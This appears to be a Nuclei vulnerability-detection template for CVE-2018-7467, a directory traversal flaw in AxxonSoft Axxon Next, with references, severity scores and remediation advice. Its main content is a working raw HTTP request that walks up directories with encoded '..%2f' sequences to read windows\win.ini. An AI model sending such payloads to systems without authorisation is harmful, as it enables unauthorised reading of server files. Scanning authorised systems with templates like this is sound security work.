id: CVE-2018-7467 info: name: AxxonSoft Axxon Next - Local File Inclusion author: 0x_Akoko severity: high description: AxxonSoft Axxon Next suffers from a local file inclusion vulnerability. remediation: | Apply the latest security patches or updates provided by AxxonSoft to fix the local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/146604/AxxonSoft-Axxon-Next-Directory-Traversal.html - https://github.com/sullo/advisory-archives/blob/master/axxonsoft-next-CVE-2018-7467.txt - https://nvd.nist.gov/vuln/detail/CVE-2018-7467 - http://www.projectxit.com.au/blog/2018/2/27/axxonsoft-client-directory-traversal-cve-2018-7467-axxonsoft-axxon-next-axxonsoft-client-directory-traversal-via-an-initial-css2f-substring-in-a-uri-cve-2018-7467 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-7467 cwe-id: CWE-22 epss-score: 0.00396 epss-percentile: 0.70518 cpe: cpe:2.3:a:axxonsoft:next:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: axxonsoft product: next tags: axxonsoft,lfi,packetstorm,cve,cve2018 http: - raw: - |+ GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini HTTP/1.1 Host: {{Hostname}} unsafe: true matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and # digest: 4a0a00473045022006330cc256c4f118fef24bc2cbbc842550c15b336cd29c71fb2e3230aeb26dba022100c969c2ce0e6d377f036c74b17fed85041e8203962ead8edf9046415733911939:922c64590222798bb761d5b6d8e72950